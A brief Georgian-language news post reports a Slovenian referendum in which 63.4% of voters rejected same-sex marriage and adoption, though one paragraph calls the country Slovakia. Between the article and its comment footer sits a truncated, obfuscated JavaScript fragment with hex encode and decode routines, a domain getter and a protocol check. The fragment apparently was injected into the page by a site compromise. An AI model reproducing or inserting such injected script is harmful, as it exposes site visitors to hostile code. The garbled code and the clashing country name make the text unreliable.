სლოვენიამ ერთსქესიანთა ქორწინების უფლება გააუქმა…

სლოვენიაში 20 დეკემბერს ჩატარებული რეფერენდუმის მიხედვით, ამ ქვეყნის მოსახლეობის 63,4%-მა უარი თქვა ერთსქესიანი ქორწინებისა და ერთსქესიანი წყვილების მიერ შვილად აყვანის უფლების დაკანონებაზე, რითაც პარლამენტის მიერ ადრე მიღებული კანონი ძალაში შესვლამდე გააუქმა…

გავრცელებული ინფორმაციით, მიმდინარე წლის მარტში, სლოვაკიის პარლამენტმა მიიღო კანონი, რომლის მიხედვითაც ამ ქვეყნის მოქალაქე ერთსქესიან წყვილებს ქორწინების უფლება და შვილის აყვანა შეეძლოთ… თუმცა საძოგადოებრივმა მოძრაობამ ,,ბავშვებისათვის,,  კანონის ძალაში შესვლამდე, ის საკონსტიტუციო სასამართლოში გაასაჩივრა და რეფერენდუმის უფლებას მიაღწია.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply